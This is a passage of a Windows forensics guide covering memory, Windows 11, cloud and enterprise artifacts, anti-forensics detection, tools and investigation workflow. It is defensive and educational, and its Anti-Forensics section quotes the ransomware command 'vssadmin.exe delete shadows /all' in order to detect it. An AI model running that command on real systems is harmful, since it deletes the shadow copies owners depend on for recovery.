• Cross-Correlation: Evidence from memory is a snapshot in time. Suspicious network connection found with netscan should be correlated with SRUM, firewall logs, and DNS Cache

Hibernation Files (hiberfil.sys)#

• Location / Notes: C:\hiberfil.sys. Compressed memory image created during hibernation. Can contain historical memory state.
• Importance: 9/10

What It Is#

When a Windows system hibernates, it writes the contents of physical memory to the hibernation file. This file can contain memory artifacts from the time of hibernation, effectively providing a historical memory snapshot.

Evidence Provided#

Similar to a live memory dump, hibernation files can contain process information, network connections, injected code, and other volatile artifacts that existed at the time the system hibernated.

Forensic Use Cases#

Use tools like Volatility to analyze hibernation files similar to memory dumps. The file may be compressed, so tools must support the appropriate decompression. This can provide historical context for system state.

Limitations & Correlation#

• Hibernation Dependency: Only exists if the system has been hibernated, not if it was simply shut down or restarted
• Compression: The file is typically compressed, requiring appropriate tools for analysis
• Time Sensitivity: Represents system state at the time of hibernation, not current state
• Cross-Correlation: Use hibernation file analysis to establish historical system state and correlate with Event Logs and $MFT timestamps

Virtual Memory (pagefile.sys)#

• Location / Notes: C:\pagefile.sys. Virtual memory swap file that may contain fragments of memory from various processes.
• Importance: 8/10

What It Is#

The Windows page file serves as virtual memory extension, storing memory pages that have been swapped out of RAM. This file can contain fragments of data from various processes over time.

Evidence Provided#

May contain passwords, encryption keys, document fragments, URLs, IP addresses, and other sensitive data that was previously in memory but swapped to disk.

Forensic Use Cases#

Use string extraction tools or specialized page file analyzers to search for artifacts. Look for specific patterns like IP addresses, URLs, file paths, or encrypted data blocks.

Limitations & Correlation#

• Fragmented Data: Information in the page file is typically fragmented and out of context
• No Process Attribution: Difficult to determine which process originally owned the data
• Time Uncertainty: Data may be from various time periods with no clear timestamps
• Cross-Correlation: Use page file findings as leads for deeper investigation. Correlate found IP addresses with Network Connection Artifacts

🆕 Windows 11-Specific Features#

Microsoft Recall (Copilot+ Systems)#

• Location / Notes: %USERPROFILE%\AppData\Local\CoreAIPlatform.00\UKP\*\*. Screenshots, OCR data, and activity snapshots. Windows 11 Copilot+ only.
• Importance: 10/10 (Copilot+ systems)

What It Is#

Microsoft Recall is a revolutionary forensic artifact introduced with Windows 11 Copilot+ systems. It takes periodic screenshots of user activity and uses local AI to perform Optical Character Recognition (OCR), creating a searchable database of everything visible on screen.

Evidence Provided#

Recall provides unprecedented insight into user activity:

• Screenshot Timeline: Actual images of what was displayed on screen at specific times
• OCR Text Data: Searchable text extracted from screenshots, including text in images
• Application Context: Which applications were in focus when screenshots were taken
• User Interaction Patterns: Window titles, focus changes, and activity transitions
• Temporal Correlation: Precise timestamps for all captured activity

Database Structure#

Recall stores data in SQLite databases within the CoreAIPlatform directory:

• Primary Database: Main storage for screenshot metadata and OCR results
• Binary Storage: Actual screenshot images stored separately
• Index Database: Search optimization and categorization data

Forensic Use Cases#

Recall is transformative for digital forensics, providing:

1. Complete Activity Reconstruction: See exactly what a user was doing at any given time
2. Document Content Recovery: Recover text from documents that were never saved
3. Web Activity Analysis: Capture web browsing beyond traditional browser artifacts
4. Data Exfiltration Evidence: Visual proof of sensitive data being accessed or transmitted
5. Timeline Verification: Cross-validate other artifacts against actual screenshots

Limitations & Correlation#

• Copilot+ Only: Limited to specific Windows 11 Copilot+ hardware configurations
• Privacy Controls: Users can disable Recall or exclude specific applications
• Storage Requirements: Generates large amounts of data requiring significant disk space
• Cross-Correlation: Match Recall screenshots with process execution artifacts, Network Validation with SRUM and firewall logs

Windows Copilot Integration Artifacts#

• Location / Notes: Various locations including %USERPROFILE%\AppData\Local\Microsoft\Copilot\. AI assistant interaction logs and context data.
• Importance: 8/10 (Windows 11 23H2+ systems)

What It Is#

Windows Copilot integration creates various artifacts related to AI assistant interactions, including conversation logs, context awareness data, and system integration points.

Evidence Provided#

• Conversation History: Records of user interactions with Copilot
• Context Data: System information shared with the AI assistant
• Integration Points: Evidence of Copilot’s interaction with system functions
• Privacy Controls: User preferences and data sharing settings

Forensic Use Cases#

Copilot artifacts can reveal:

• User intent and planning through AI conversations
• System information disclosure patterns
• Attempts to use AI for malicious activities
• Corporate policy violations regarding AI tool usage

Notifications Database#

• Location / Notes: %USERPROFILE%\AppData\Local\Microsoft\Windows\Notifications\. SQLite databases tracking Windows notification history and user interactions.
• Importance: 8/10 (Windows 11 systems)

What It Is#

Windows 11 maintains detailed databases of notification history, including system notifications, application notifications, and user interactions with those notifications.

Evidence Provided#

Notification content, timestamps, application sources, user responses, and interaction patterns. This can provide evidence of user activity, application behavior, and system events.

Forensic Use Cases#

Parse the notifications databases to understand user activity patterns, identify suspicious application behavior, and reconstruct timelines of system events through notification history.

Enhanced Windows Security Features#

• Location / Notes: Various logs and artifacts related to Windows 11’s enhanced security features including TPM, Secure Boot, and HVCI.
• Importance: 9/10 (Windows 11 systems)

What It Is#

Windows 11 includes mandatory enhanced security features that generate specific forensic artifacts, including TPM-related logs, Secure Boot events, and Hypervisor-protected Code Integrity (HVCI) activities.

Evidence Provided#

Security feature status, blocked applications or drivers, attestation information, and evidence of attempts to bypass security mechanisms.

Key Security Features to Monitor#

• TPM 2.0 (Mandatory): Hardware-based security for all Windows 11 devices
• Secure Boot: Boot integrity verification
• HVCI (Default Enabled): Memory integrity protection using virtualization
• VBS (Virtualization-based Security): Isolation of critical security functions

Forensic Use Cases#

Examine security feature logs to understand the security posture of the system and identify potential bypass attempts. This is particularly important for advanced persistent threats that attempt to disable security features.

☁️ Cloud Integration & Modern Authentication#

OneDrive Synchronization Artifacts#

• Location / Notes: %USERPROFILE%\AppData\Local\Microsoft\OneDrive\. Sync logs, file metadata, and cloud interaction data.
• Importance: 9/10 (Cloud-connected systems)

What It Is#

OneDrive integration in modern Windows creates extensive artifacts tracking file synchronization, sharing activities, and cloud storage interactions. These artifacts are crucial for understanding data movement and potential exfiltration.

Evidence Provided#

• Sync Logs: Detailed records of files uploaded/downloaded to/from OneDrive
• File Metadata: Information about files stored in the cloud, including sharing status
• Conflict Resolution: Records of sync conflicts and how they were resolved
• Sharing Activity: Evidence of files shared with external parties
• Access Patterns: When and how cloud files were accessed locally

Key Artifact Locations#

• Sync Logs: %USERPROFILE%\AppData\Local\Microsoft\OneDrive\logs\
• Database Files: %USERPROFILE%\AppData\Local\Microsoft\OneDrive\*.db
• Settings and State: %USERPROFILE%\AppData\Local\Microsoft\OneDrive\settings\

Forensic Use Cases#

OneDrive artifacts are invaluable for:

1. Data Exfiltration Analysis: Tracking unauthorized uploads of sensitive data
2. Timeline Reconstruction: Understanding when files were created, modified, and synced
3. Sharing Investigation: Identifying inappropriate data sharing
4. User Behavior Analysis: Understanding cloud storage usage patterns
5. Corporate Policy Violations: Detecting unauthorized cloud storage usage

Microsoft 365 Integration Points#

• Location / Notes: Various registry locations and application data folders. Evidence of Microsoft 365 service interactions and authentication.
• Importance: 9/10 (Enterprise environments)

What It Is#

Windows systems integrated with Microsoft 365 create numerous artifacts related to authentication, service access, and data synchronization across the Microsoft ecosystem.

Evidence Provided#

• Authentication Tokens: Evidence of Azure AD authentication and token usage
• Service Access Logs: Records of accessing various Microsoft 365 services
• Sync Activities: Data synchronization with SharePoint, Teams, and other services
• Policy Enforcement: Evidence of conditional access and compliance policies
• Multi-Factor Authentication: MFA challenge and response artifacts

Azure AD Joined Device Artifacts#

• Location / Notes: Registry locations and certificate stores. Evidence of cloud domain membership and enterprise management.
• Importance: 9/10 (Enterprise cloud environments)

What It Is#

Azure AD joined devices create specific artifacts related to cloud-based domain membership, conditional access policies, and enterprise device management.

Evidence Provided#

• Device Registration: Proof of Azure AD domain join and device identity
• Conditional Access: Evidence of policy evaluation and enforcement
• Certificate Management: Enterprise certificates and their usage
• Compliance Status: Device compliance reporting and remediation actions
• Enterprise Policies: Applied group policies and configuration profiles

📊 Enterprise-Specific Artifacts#

Windows Event Forwarding (WEF)#

• Location / Notes: ForwardedEvents.evtx on collector systems. Centralized event log collection from multiple systems.
• Importance: 10/10 (in enterprise environments)

What It Is#

Windows Event Forwarding allows centralized collection of event logs from multiple systems in an enterprise environment. This provides a central repository for forensic analysis across the entire network.

Evidence Provided#

Consolidated event logs from multiple systems, enabling correlation of activities across different machines, user tracking across the network, and identification of lateral movement patterns.

Forensic Use Cases#

Query the ForwardedEvents.evtx log on collector systems for enterprise-wide analysis. This is particularly valuable for tracking lateral movement, coordinated attacks, and user activities across multiple systems.

Group Policy Artifacts#

• Location / Notes: Various registry locations and %WINDIR%\System32\GroupPolicy. Evidence of applied policies and configuration changes.
• Importance: 9/10 (in domain environments)

What It Is#

Group Policy artifacts provide evidence of centrally managed configuration changes, security policies, and administrative actions in domain environments.

Evidence Provided#

Applied policies, configuration changes, software deployment, security settings, and administrative preferences that were pushed from domain controllers.

Forensic Use Cases#

Examine Group Policy artifacts to understand the security posture of the system, identify policy violations, and trace administrative actions. This is particularly important for understanding whether security mechanisms were disabled.

Microsoft Defender for Endpoint Artifacts#

• Location / Notes: %PROGRAMDATA%\Microsoft\Windows Defender\. Telemetry data, detection logs, and behavioral analysis artifacts.
• Importance: 10/10 (Enterprise security environments)

What It Is#

Microsoft Defender for Endpoint creates extensive artifacts related to endpoint detection and response (EDR), behavioral analysis, and advanced threat protection. These artifacts provide detailed insight into security events and threat hunting activities.

Evidence Provided#

• Detection Events: Detailed records of malware detections and behavioral alerts
• Process Behavior Analysis: Advanced telemetry on process creation and behavior
• Network Connection Monitoring: Detailed network activity analysis
• File Reputation Data: Information about file signatures and reputation scores
• Threat Intelligence: Correlation with Microsoft’s threat intelligence feeds
• Remediation Actions: Evidence of automatic and manual threat remediation

Windows Subsystem for Linux (WSL) Artifacts#

• Location / Notes: %USERPROFILE%\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu*\, WSL distribution folders. Linux environment artifacts within Windows.
• Importance: 8/10 (Developer and advanced user environments)

What It Is#

WSL creates a Linux environment within Windows, generating unique forensic artifacts that combine Windows and Linux characteristics. These artifacts are increasingly important as attackers use WSL to evade traditional Windows-focused detection.

Evidence Provided#

• Linux File System: Complete Linux directory structure and file metadata
• Process Execution: Linux process execution within Windows environment
• Network Activity: Linux network connections that may bypass Windows monitoring
• Package Management: Installed packages and software distribution artifacts
• User Activity: Linux command history and configuration files
• Interoperability: Evidence of Windows-Linux file system interactions

📋 Modern Windows Considerations#

Windows 11 Changes & New Challenges#

Registry Evolution#

The Windows 11 registry is significantly different from Windows 10’s. Relying on outdated registry cheat sheets can lead to missed evidence. Tools must be updated to parse new keys, especially those related to shell UI (ShellBags) and application execution.

Timeline Database Deprecation#

The ActivitiesCache.db, a rich source of user activity in Windows 10, is largely abandoned in Windows 11. While the database file may exist, it is rarely populated with meaningful data. Do not rely on it. Pivot to artifacts like Jump Lists, LNK files, and the new Windows Notifications Database.

Enhanced Security Implications#

TPM 2.0 and Secure Boot are mandatory. HVCI (Hypervisor-Protected Code Integrity), also known as Memory Integrity, is on by default for most new installations. This makes kernel-level malware and certain exploitation techniques much harder, pushing attackers towards user-mode techniques. Be prepared to see more log evidence of blocked attacks.

Anti-Forensics Awareness#

Registry Manipulation Techniques#

Attackers can create registry keys with embedded null characters. Tools like Windows’ built-in reg.exe may stop parsing at the null, effectively hiding subsequent keys or values. Use forensics-aware tools like RegRipper that can properly handle these edge cases.

Volume Shadow Copy Attacks#

vssadmin.exe delete shadows /all is a common command used by ransomware and wipers. Look for its execution in 4688 logs, Prefetch, and Amcache. The absence of Volume Shadow Copies on a system that should have them is, in itself, a finding.

Event Log Manipulation#

The classic sign is Event ID 1102 in the Security log. However, a more subtle method is targeted event log deletion using tools that don’t generate an 1102 event. Look for gaps in the event record numbers to spot this.

Timestamp Manipulation#

Attackers can modify $STANDARD_INFORMATION timestamps in the $MFT, but $FILE_NAME timestamps are much harder to alter. Always compare both sets of timestamps.

Execution Artifact Evasion#

Sophisticated attackers may attempt to avoid leaving execution artifacts by using techniques like direct system calls, process hollowing, or fileless execution methods.

Tool Evolution Requirements#

Stay Current with Updates#

Eric Zimmerman’s March 2023 updates to AppCompatCacheParser now properly parse Windows 10/11 execution flags. Stay current with tool updates as new Windows versions introduce parsing challenges. The forensic community continues to research and improve artifact understanding.

Evolving Artifact Support#

The Program Compatibility Assistant artifact continues to evolve with new Windows updates. Tool support for Windows 11’s Capability Access Manager is still developing. Monitor the forensic community for new parsing tools and techniques.

Enterprise Integration Considerations#

Centralized Logging#

Leverage Windows Event Forwarding, SIEM systems, and centralized logging solutions for enterprise-wide correlation.

Cloud Integration#

Modern Windows systems heavily integrate with cloud services. Consider cloud-based artifacts in Microsoft 365, Azure AD, and OneDrive.

Modern Authentication#

Windows 11’s integration with Azure AD and modern authentication methods creates new artifacts in cloud logs that may be crucial for complete investigations.

🔧 Comprehensive Tool Suite#

Essential Command-Line Tools#

Eric Zimmerman’s Tools (Gold Standard)#

• MFTECmd.exe: $MFT and $UsnJrnl parsing
• PECmd.exe: Prefetch file analysis
• AmcacheParser.exe: Amcache.hve parsing
• AppCompatCacheParser.exe: ShimCache analysis (ensure post-March 2023 version)
• SrumECmd.exe: SRUM database parsing
• LECmd.exe: LNK file and PCA artifact analysis
• JLECmd.exe: Jump Lists parsing
• EvtxECmd.exe: Event log processing
• RBCmd.exe: Registry analysis including BAM/DAM
• Timeline Explorer: CSV analysis and timeline construction

Specialized Analysis Tools#

• Mark Baggett’s SRUM-dump: Alternative SRUM analysis with GUI
• Volatility 3: Memory analysis framework
• RegRipper: Registry analysis with extensive plugin library
• KAPE (Kroll Artifact Parser and Extractor): Automated artifact collection and processing
• Plaso (log2timeline): Super timeline construction

Enterprise and Advanced Tools#

• Velociraptor: Endpoint visibility and artifact collection
• AXIOM by Magnet Forensics: Commercial forensic platform with extensive Windows support
• EnCase: Traditional forensic platform with Windows artifact support
• X-Ways Forensics: Efficient forensic analysis with strong Windows support

Live Response and Triage Tools#

• KAPE Triage Mode: Rapid artifact collection for live response
• Sysinternals Suite: Live system analysis and monitoring
• Autoruns: Persistence mechanism identification
• Process Monitor (ProcMon): Real-time file system and registry monitoring

🎯 Investigation Workflow#

Initial Triage Phase#

1. System Information Gathering

   • OS version, patch level, installed software
   • User accounts and last logon times
   • Network configuration and external connections

2. Rapid Artifact Collection

   • Use KAPE triage mode for quick artifact gathering
   • Focus on high-value, time-sensitive artifacts
   • Prioritize artifacts likely to be cleared or overwritten

3. Timeline Construction

   • Parse $MFT and $UsnJrnl for file system timeline
   • Extract and parse Prefetch files for execution evidence
   • Analyze Event Logs for system events and logons

Deep Analysis Phase#

1. Execution Analysis

   • Correlate Prefetch, Amcache, ShimCache, and BAM/DAM
   • Cross-reference with Event ID 4688 process creation logs
   • Analyze PowerShell logs for script-based attacks

2. Persistence Analysis

   • Examine all autostart locations (Run keys, Services, Scheduled Tasks)
   • Check for sophisticated persistence (WMI, COM hijacking, IFEO)
   • Validate findings against execution artifacts

3. User Activity Reconstruction

   • Parse LNK files and Jump Lists for user file access
   • Analyze UserAssist and RunMRU for GUI activity
   • Examine browser artifacts and network connections

4. Network and Lateral Movement

   • Analyze SRUM for network usage patterns
   • Examine RDP artifacts and Security Event Logs
   • Correlate with network logs and DNS resolution

Advanced Analysis Phase#

1. Memory Analysis (if available)

   • Analyze memory dumps for fileless malware
   • Extract network connections and process information
   • Search for injected code and rootkit activity

2. Anti-Forensics Detection

   • Look for evidence of log clearing (Event ID 1102)
   • Check for timestomping by comparing $SI and $FN timestamps
   • Identify gaps in expected artifact presence

3. Attribution and Impact Assessment

   • Correlate activities with specific user accounts
   • Assess data access and potential exfiltration
   • Determine scope and timeline of compromise

🔍 Advanced Correlation Techniques#

Cross-Artifact Validation#

When analyzing execution evidence, always seek validation across multiple artifacts:

Execution Triad: Prefetch → Amcache → ShimCache#

• Prefetch provides run count and recent execution times
• Amcache provides first execution time and file hash
• ShimCache provides file presence and modification time

User Attribution Stack: BAM/DAM → SRUM → Event Logs#

• BAM/DAM links execution to specific user SIDs
• SRUM provides resource usage and network context
• Event Logs provide logon context and parent processes

Network Activity Chain: SRUM → Event Logs → RDP Artifacts#

• SRUM shows process-level network usage
• Event Logs provide authentication context
• RDP artifacts show remote access patterns

Timeline Pivoting Strategies#

Use timestamp correlation to identify related activities:

File Creation → Execution Correlation#

• Find suspicious file creation in $UsnJrnl
• Pivot to Prefetch files for execution evidence
• Validate with Amcache entries and Event ID 4688

Logon → Activity Correlation#

• Identify suspicious logons in Security Event Logs
• Correlate with BAM/DAM entries for that user SID
• Cross-reference with SRUM for network activity

Process → Network Correlation#

• Find suspicious processes in execution artifacts
• Correlate with SRUM network usage data
• Validate with firewall logs and DNS resolution

Advanced Anti-Forensics Detection#

Timestamp Anomaly Detection#

• Compare $STANDARD_INFORMATION vs $FILE_NAME timestamps
• Look for impossible timestamp sequences (future dates, etc.)
• Identify timestamps that don’t correlate across artifacts

Artifact Presence Analysis#

• Expected artifacts missing (no Prefetch for known execution)
• Suspicious artifact abundance (too many entries for timeframe)
• Inconsistent retention across artifact types

Log Gap Analysis#

• Missing event log entries in expected sequences
• Gaps in USN Journal sequences
• Inconsistent SRUM data retention patterns

📚 Conclusion: The Path Forward for Practitioners#

The core principles of digital forensics remain unchanged: be methodical, document everything, and maintain the integrity of your evidence. However, the ground beneath our feet is constantly shifting. The artifacts detailed here represent the current state of play for 2025, but the evolution will not stop.

To remain effective, practitioners must embrace a philosophy of continuous learning and adaptation.

Key Takeaways for Modern DFIR#

1. Windows 11 Brings New Opportunities

   • PCA artifacts provide rich execution data with timestamps
   • CAM databases offer unprecedented insight into privacy-sensitive resource access
   • Enhanced security features create new evidence of blocked attacks
   • Microsoft Recall (on Copilot+ systems) provides revolutionary user activity tracking
   • But traditional artifacts like Timeline are deprecated - adjust your methods accordingly

2. Tool Evolution is Critical

   • Eric Zimmerman’s March 2023 updates to AppCompatCacheParser now properly parse Windows 10/11 execution flags
   • Stay current with tool updates as new Windows versions introduce parsing challenges
   • The forensic community continues to research and improve artifact understanding

3. Correlation is King

   • Never base a finding on a single artifact
   • Build webs of evidence across multiple artifact types
   • Use timestamps and user attribution to strengthen connections
   • A Prefetch file is good; a Prefetch file corroborated by an Amcache entry, a 4688 process creation event, and network traffic in SRUM is undeniable

4. Anti-Forensics Awareness is Essential

   • Modern attackers are increasingly forensics-aware
   • Look for evidence of anti-forensic activity (log clearing, timestomping, artifact manipulation)
   • Understand the limitations of your artifacts and tools
   • When expected artifacts are missing, that absence itself is a finding

5. Enterprise Context Matters

   • Leverage centralized logging and enterprise visibility tools
   • Consider cloud integration and modern authentication methods
   • Scale your techniques for enterprise-wide investigations
   • Understand that modern Windows systems are deeply integrated with cloud services

The Continuous Learning Imperative#

The DFIR field demands continuous learning because:

• Operating Systems Evolve: Each Windows update can introduce new artifacts or change existing ones
• Attackers Adapt: As defensive capabilities improve, attackers develop new techniques
• Tools Improve: The community continuously develops better parsing and analysis capabilities
• Research Advances: Academic and industry research regularly reveals new artifact sources and analysis techniques

Practical Next Steps#

1. Tool Hygiene: Regularly update your forensic tools and validate their output against known data sets
2. Community Engagement: Stay connected with the DFIR community through forums, conferences, and research publications
3. Lab Testing: Build test environments to understand how artifacts behave under different conditions
4. Documentation: Maintain detailed documentation of your findings and methods for peer review and knowledge sharing
5. Cross-Training: Understand not just what artifacts exist, but why they exist and how they’re created

Final Thoughts#

This comprehensive guide represents the collective knowledge of the DFIR community as of 2025. It builds on the foundational work of researchers, practitioners, and tool developers who have advanced our understanding of Windows forensics. However, it is not the final word - it is a snapshot of current knowledge that will inevitably need updating as technology evolves.

The most successful DFIR practitioners are those who combine deep technical knowledge with strong analytical thinking, effective communication skills, and an insatiable curiosity about how systems work. Master the artifacts and techniques described here, but always be prepared to learn new ones.

By understanding these artifacts deeply, correlating them effectively, and staying current with evolving techniques, we can continue to uncover the truth regardless of how adversaries or operating systems evolve. The fight between attackers and defenders will continue, but with thorough knowledge of these forensic artifacts, we remain well-equipped to tell the story of what really happened on any Windows system.

Remember: every investigation is an opportunity to learn something new. Every artifact tells part of a story. And every correlation between artifacts brings us closer to the complete truth.

The truth is in the artifacts. You just need to know where to look and how to interpret what you find.

📖 Resources for Continued Learning#

Key Educational Resources#

• SANS FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics
• AboutDFIR.com: Comprehensive artifact and tool database
• Eric Zimmerman’s Blog: Regular updates on tool capabilities and new research
• DFIR Community Forums: Active discussions on new techniques and findings
• Academic Research: Peer-reviewed papers on emerging forensic techniques

Essential Tools Download Links#

• Eric Zimmerman Tools: https://ericzimmerman.github.io/
• KAPE: https://www.krollkape.com/
• Volatility: https://www.volatilityfoundation.org/
• RegRipper: https://github.com/keydet89/RegRipper3.0

Best Practices for Staying Current#

1. Subscribe to Research Publications: Stay informed about new forensic research and techniques
2. Participate in Community Challenges: Practice skills on forensic challenges and CTFs
3. Build Test Environments: Create lab environments to test new tools and techniques
4. Follow Tool Developers: Stay updated with tool improvements and new capabilities
5. Document Your Findings: Share knowledge with the community through blogs, presentations, or papers

This guide represents the current state of Windows forensic knowledge as of 2025. The DFIR community continues to research and discover new artifacts and analysis techniques. Stay engaged with the community, keep learning, and always question what you think you know.